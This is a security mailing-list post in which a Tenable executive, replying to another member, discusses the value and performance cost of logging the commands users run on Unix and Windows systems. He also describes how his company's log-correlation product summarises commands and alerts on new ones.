Joe Magee wrote: > We've certainly seen it. Can be a bit noisy in a production *nix environment. > A lot of times we isolate this to say "PCI" systems or other compliance > targets... > > With that said, it's also interesting seeing those backup jobs running as > root, or better yet seeing the backup jobs failing as root (ie not running.) > Then running a report that shows that happening every night for the past > month (doh!) > > I miss Squire... :) > > - Joe > > P.S. Who's not a lurker! (that'd be me..)
I've also heard folks say that this causes a performance hit. I think the hit is really on your log server and disk drive. I'm a fan of doing this sort of logging because after the fact, if you really need to know what an admin or a hacker did, you have a lot more to go on that just login/logout logs. I wish both Windows and Unix platforms did more to log the arguments of the commands run. Having said that, our approach with our Log Correlation Engine product is to: - summarize all unique commands and user accounts run on a daily basis which makes for a nice quick report. - alert the first time when a new command is run during a given hour of the day. - have all of the process/program accounting logs available with other logs in case you need to look that close at what happened. A lot of folks tend to do this sort of auditing on their databases, but I'd like to see more folks run this on their web app servers. It won't help for someone who can steal/ex-filtrate data, but it can help if someone is invoking a command through a web app flaw. -- Ron Gula, CEO Tenable Network Security _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
